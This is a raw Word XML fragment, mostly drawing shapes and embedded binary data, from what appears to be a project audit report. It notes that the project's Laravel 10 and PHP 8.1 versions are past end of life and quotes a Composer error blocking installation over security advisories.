AAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEA5pgT&#10;4+AAAAAIAQAADwAAAAAAAAAAAAAAAACgBgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAA&#10;AK0HAAAAAA==&#10;">
                <v:shape id="Shape 1584" o:spid="_x0000_s1027" style="position:absolute;left:2286;width:10477;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1047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RgwgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Li8Iw&#10;EL4v+B/CCHtbUxcftRpFFoQ96GHVi7ehGdNiMylJrN1/vxGEvc3H95zVpreN6MiH2rGC8SgDQVw6&#10;XbNRcD7tPnIQISJrbByTgl8KsFkP3lZYaPfgH+qO0YgUwqFABVWMbSFlKCuyGEauJU7c1XmLMUFv&#10;pPb4SOG2kZ9ZNpMWa04NFbb0VVF5O96tAnk3cp7TfG+a8X52QL/gS7dQ6n3Yb5cgIvXxX/xyf+s0&#10;f5pP4PlNOkGu/wAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQD48+RgwgAAAN0AAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m9525,l1038225,v2630,,4875,930,6735,2778c1046820,4638,1047750,6890,1047750,9525r,123825c1047750,135979,1046820,138224,1044960,140084v-1860,1861,-4105,2791,-6735,2791l9525,142875v-2630,,-4875,-930,-6735,-2791c930,138224,,135979,,133350l,9525c,6890,930,4638,2790,2778,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1047750,142875"/>
                </v:shape>
                <v:shape id="Shape 1593" o:spid="_x0000_s1028" style="position:absolute;top:1714;width:2857;height:1429;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WmxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0L/odlhN50o2KxqauIWmgPQo3tfciO2WB2Nma3MfbXu0Kht3m8z1msOluJlhpfOlYwHiUgiHOn&#10;Sy4UfB3fhnMQPiBrrByTght5WC37vQWm2l35QG0WChFD2KeowIRQp1L63JBFP3I1ceROrrEYImwK&#10;qRu8xnBbyUmSPEuLJccGgzVtDOXn7Mcq2NdVGeRsd77sD5m5fX9uP9rtr1JPg279CiJQF/7Ff+53&#10;HefPXqbw+CaeIJd3AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAAqd1abEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m9525,l276225,v2630,,4875,930,6735,2791c284820,4651,285750,6890,285750,9525r,123825c285750,135973,284820,138212,282960,140072v-1860,1860,-4105,2791,-6735,2803l9525,142875v-2630,-12,-4875,-943,-6735,-2803c930,138212,,135973,,133350l,9525c,6890,930,4651,2790,2791,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,285750,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6528" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6F427981" wp14:editId="643C47BE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2285107</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-19483</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="400050" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="28785" name="Group 28785"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="400050" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="400050" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1587" name="Shape 1587"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="400050" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="400050" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="390525" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="393155" y="0"/>
                                  <a:pt x="395400" y="930"/>
                                  <a:pt x="397260" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="399120" y="4638"/>
                                  <a:pt x="400050" y="6890"/>
                                  <a:pt x="400050" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="400050" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="400050" y="135979"/>
                                  <a:pt x="399120" y="138224"/>
                                  <a:pt x="397260" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="395400" y="141945"/>
                                  <a:pt x="393155" y="142875"/>
                                  <a:pt x="39052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C6727CA" id="Group 28785" o:spid="_x0000_s1026" style="position:absolute;margin-left:179.95pt;margin-top:-1.55pt;width:31.5pt;height:11.25pt;z-index:-251389952" coordsize="400050,1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qS6TgMAAKAJAAAOAAAAZHJzL2Uyb0RvYy54bWykVttu2zAMfR+wfzD8vvoWJ3HQpMDWy8uw&#10;FWv3AaoixwZsy5CUONnXj6IsxXaKYmv7kMoiDy+HFKXrm2NdeQcmZMmbtR9dhb7HGsq3ZbNb+7+f&#10;778sfU8q0mxJxRu29k9M+jebz5+uu3bFYl7wasuEB0YaueratV8o1a6CQNKC1URe8ZY1IMy5qImC&#10;T7ELtoJ0YL2ugjgM50HHxbYVnDIpYffWCP0N2s9zRtXPPJdMedXah9gU/gr8fdG/weaarHaCtEVJ&#10;+zDIO6KoSdmAU2fqliji7UV5YaouqeCS5+qK8jrgeV5ShjlANlE4yeZB8H2LuexW3a51NAG1E57e&#10;bZb+ODyI9ql9FMBE1+6AC/zSuRxzUev/EKV3RMpOjjJ2VB6FzVkYhikQS0EUzeLlIjWU0gJ4v0DR&#10;4u5NXGCdBqNQuhaaQ57zlx/L/6kgLUNa5QryfxReuYXo0+XC9xpSQ5eihoc7SAvqOZLkSgJfH2PI&#10;ZUpWdC/VA+NINTl8l8r05NauSGFX9NjYpYDOfrOnW6I0Tkepl153rlXhSqWlNT+wZ456ShcsS+PU&#10;92ylIc6zQtUMFZMsnKpaBbp/KelX9mesnkTpwDLEhf6SLIUmQo9Z0h9IK1nEcyOJF4ulbiwIZ2x7&#10;/GVxWRQb3GyeIM46s+0K6c2X2cjbQIQUvObN5mf8DBBRkiRwDAzGar0W2wiTZovMHJeLwKNkGcez&#10;sdCxEYGVJQr/kQ/HcDSLsll/RK1PV5bh+bVCV+Kz8MKnzddgXP+MEFbnNU6gEqYvzghXr7keLjhb&#10;poHHC6ifEf0XG7rJEHbBsN2flsXuD0o8TsMmZwgw6oMesuIxaKg87UUb47R9Xc7/dR5mlsTJ+XK8&#10;j86Bq59t53HYtOKSmT7XcwWPpJs12BrnaVY1euwAH5TA1Z5XROEdWZcK7vyqrGEOxQu4QNy5AWt6&#10;1pvxiit1qpieTVXzi+Uwp/Ee0htS7F6+VcI7EH2z4x8aJ1VbkH63t9urYqhoR+PzsqqcyQihI5N3&#10;t/fx/by30CtrHMNHhUOGBkn7aMzLAu5nSNq+L4AUB0LPvFEO38CrCJ0MstXLF7494Z2MhMDlh9Tg&#10;MwDz6J8s+p0x/Eat88Nq8xcAAP//AwBQSwMEFAAGAAgAAAAhANR+a7XgAAAACQEAAA8AAABkcnMv&#10;ZG93bnJldi54bWxMj01rwkAQhu+F/odlCr3p5kNLE7MRkbYnKaiF4m1MxiSY3Q3ZNYn/vtNTe5yZ&#10;h3eeN1tPuhUD9a6xRkE4D0CQKWzZmErB1/F99grCeTQlttaQgjs5WOePDxmmpR3NnoaDrwSHGJei&#10;gtr7LpXSFTVpdHPbkeHbxfYaPY99JcseRw7XrYyC4EVqbAx/qLGjbU3F9XDTCj5GHDdx+Dbsrpft&#10;/XRcfn7vQlLq+WnarEB4mvwfDL/6rA45O53tzZROtAriZZIwqmAWhyAYWEQRL85MJguQeSb/N8h/&#10;AAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29u&#10;dGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAA&#10;LwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhALwipLpOAwAAoAkAAA4AAAAAAAAAAAAAAAAA&#10;LgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhANR+a7XgAAAACQEAAA8AAAAAAAAAAAAA&#10;AAAAqAUAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAC1BgAAAAA=&#10;">
                <v:shape id="Shape 1587" o:spid="_x0000_s1027" style="position:absolute;width:400050;height:142875;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="400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BZ0wAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9LawIx&#10;EL4X/A9hhN5q0kJVtkYRodg9+mjPw2bcLLuZLEl0t/++KQje5uN7zmozuk7cKMTGs4bXmQJBXHnT&#10;cK3hfPp8WYKICdlg55k0/FKEzXrytMLC+IEPdDumWuQQjgVqsCn1hZSxsuQwznxPnLmLDw5ThqGW&#10;JuCQw10n35SaS4cN5waLPe0sVe3x6jT84N5vHZahLL+VsuYy7Np20Pp5Om4/QCQa00N8d3+ZPP99&#10;uYD/b/IJcv0HAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAAAAAA&#10;AAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA+AgWdMAAAADdAAAADwAAAAAA&#10;AAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPQCAAAAAA==&#10;" path="m9525,l390525,v2630,,4875,930,6735,2778c399120,4638,400050,6890,400050,9525r,123825c400050,135979,399120,138224,397260,140084v-1860,1861,-4105,2791,-6735,2791l9525,142875v-2630,,-4875,-930,-6735,-2791c930,138224,,135979,,133350l,9525c,6890,930,4638,2790,2778,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,400050,142875"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Root cause: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>laravel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/framework</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> pinned to </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>^10.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">10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Laravel 10's security support ended 2025-02-04</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the project ran on PHP </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>^8.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1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whose support ended 2025-12-31. Both framework and runtime were past end of life.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B080B4E" w14:textId="77777777" w:rsidR="00C73B1A" w:rsidRPr="005C54CB" w:rsidRDefault="00C73B1A" w:rsidP="00C73B1A">
      <w:pPr>
        <w:spacing w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="43"/>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This turned out not to be a theoretical concern. </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Composer now refuses to install any 10.x release at all:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA692C4" w14:textId="77777777" w:rsidR="00C73B1A" w:rsidRPr="005C54CB" w:rsidRDefault="00C73B1A" w:rsidP="00C73B1A">
      <w:pPr>
        <w:spacing w:after="239"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779923DB" wp14:editId="49016E9C">
                <wp:extent cx="6480126" cy="714375"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="28775" name="Group 28775"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6480126" cy="714375"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6480126" cy="714375"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1433" name="Shape 1433"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6480126" cy="714375"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="6480126" h="714375">
                                <a:moveTo>
                                  <a:pt x="19050" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="6467474" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6470001" y="0"/>
                                  <a:pt x="6472430" y="484"/>
                                  <a:pt x="6474764" y="1439"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="6480126" y="5021"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6480126" y="709340"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6474764" y="712912"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6472430" y="713879"/>
                                  <a:pt x="6470001" y="714363"/>
                                  <a:pt x="6467474" y="714375"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="19050" y="714375"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="16524" y="714363"/>
                                  <a:pt x="14094" y="713879"/>
                                  <a:pt x="11760" y="712912"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="9426" y="711944"/>
                                  <a:pt x="7366" y="710568"/>
                                  <a:pt x="5580" y="708794"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="3793" y="706996"/>
                                  <a:pt x="2417" y="704943"/>
                                  <a:pt x="1450" y="702605"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="695325"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="19050"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1450" y="11745"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="2417" y="9413"/>
                                  <a:pt x="3793" y="7348"/>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598" name="Rectangle 1598"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="155011"/>
                            <a:ext cx="4273754" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4CDBD7E1" w14:textId="77777777" w:rsidR="00C73B1A" w:rsidRDefault="00C73B1A" w:rsidP="00C73B1A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">Root </w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>composer.json</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> requires </w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>laravel</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>/framework ^10.10, found</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1599" name="Rectangle 1599"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="326461"/>
                            <a:ext cx="4418627" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="28F5B86B" w14:textId="77777777" w:rsidR="00C73B1A" w:rsidRDefault="00C73B1A" w:rsidP="00C73B1A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>laravel</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>/</w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>framework[</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>v10.10.0, ..., v10.50.3] but these were not</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1600" name="Rectangle 1600"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="497911"/>
                            <a:ext cx="4056444" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="75B0A700" w14:textId="77777777" w:rsidR="00C73B1A" w:rsidRDefault="00C73B1A" w:rsidP="00C73B1A">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>loaded, because they are affected by security advisories</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="779923DB" id="Group 28775" o:spid="_x0000_s1186" style="width:510.25pt;height:56.25pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="64801,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ghpiAQAAOQPAAAOAAAAZHJzL2Uyb0RvYy54bWzkV92umzgQvl9p3wFxvyc2GAjRyam27fZo&#10;pVVbtd0HcIgJSAYj4/ycPv2OxxhCkm2lU6mt1FwEY8/vN+OZ4f7FqZHBQei+Vu06pHckDERbqG3d&#10;7tbhv5/e/LEMg97wdsulasU6fBJ9+OLh99/uj91KRKpScit0AELafnXs1mFlTLdaLPqiEg3v71Qn&#10;WjgslW64gVe9W2w1P4L0Ri4iQtLFUeltp1Uh+h52X7vD8AHll6UozLuy7IUJ5DoE2wz+a/zf2P/F&#10;wz1f7TTvqroYzODPsKLhdQtKR1GvueHBXtdXopq60KpXpbkrVLNQZVkXAn0Abyi58OZRq32HvuxW&#10;x103wgTQXuD0bLHF28Oj7j527zUgcex2gAW+WV9OpW7sE6wMTgjZ0wiZOJmggM2ULQmN0jAo4Cyj&#10;LM4Sh2lRAfBXbEX115cZF17tYmbMsYP06CcE+m9D4GPFO4HA9itA4L0O6i1kL4vjMGh5A3mKFAHu&#10;IDBIN8LUr3pA7BsxGl3lq2Lfm0ehEG1++Kc3Li23fsUrvypOrV9qSO4vpnXHjeWzZtplcDwLVzVG&#10;yx436iA+KSQ0NmY0JwncFh9usHSikO05ZcrSjGVsRuspiv2mLl6Kz3P6jBBCJ3qwDVWmLItY7JSy&#10;JXNJNB6xLHU6ICK5PQOT5uK9Us8ypCW4kJCIDiyeyD+viTOSxwzLAmjwZP7pycHjwZyMRjmNLqTP&#10;DRuZRvcyGi8z9OLM+REVe4nSeO7/hPF0xb6CwBTCGYt35ZaNNE0ih/K1DZSR3J9dWk9plrrAzeCY&#10;q5i/OVByZisHFg6as1nMszj1RyRJl+dwJMly0EYARuS6wuKWtjjL4XpbbSTN8/RcZMRoNhyxnM3A&#10;p2y4CRmJUoLF7UqbB9V55YxL8ySOPLkn8M9zQhcol9L+3D8d3WgCAM0uRd7ydHQnZ3TmzARBzG5j&#10;miTp7ft1S88YpDhbzvSMgY0YmQE9pcr/XuRbiqbsuygNU8oOrXxA7Kp+zaUWUvXCQW4rI5aTsVpi&#10;eKd6LFtbOCGoBYf5pJTcYKNvagODi6wbqJaRrWljEQBptl25DoEr8ySFLa6y/SBKaDXYTO1Gr3eb&#10;V1IHB27HE/yhcC67ig+7g9yBFE1FOZa/rKUcRVJknYmkJHrJMADg1EBs+QRORiMncZzFYI0bj2DI&#10;AKf9kAT8IxNqVq0Z+VsY7dDMM2/tcqO2TzhYICDQv+2I8T0aeZLD2Oka+QfokrzdSRFQuwtBtyZA&#10;0/96M6eEZImrCzRJCMUuAjgMEwyLMph2oCja0YfGJKe+FvnBqdMujQK7WIe2YbvwDi0eQPUkFlPZ&#10;2v9WvYGo+npwlUzmtDm5acV1tQnnoFL68zuYxUupIGOhpeMqtOM5aLenYSD/bmF2gsAav9B+sfEL&#10;beQrhfOys+fPvVFlbWcSjKOL6vDyXYOa3wwq1qvnBDWOYHq5DCqjyzSCoP+ooOIw8esENYXCeX1T&#10;7e4zbyrLs/zqpsIIwWC++GFBxeb4MwQVv6rgUxLbyPDZa79Vz9/xZk8f5w//AQAA//8DAFBLAwQU&#10;AAYACAAAACEAZLZdGtwAAAAGAQAADwAAAGRycy9kb3ducmV2LnhtbEyPQUvDQBCF74L/YRnBm91N&#10;JCIxm1KKeiqCrSDeptlpEpqdDdltkv57t17s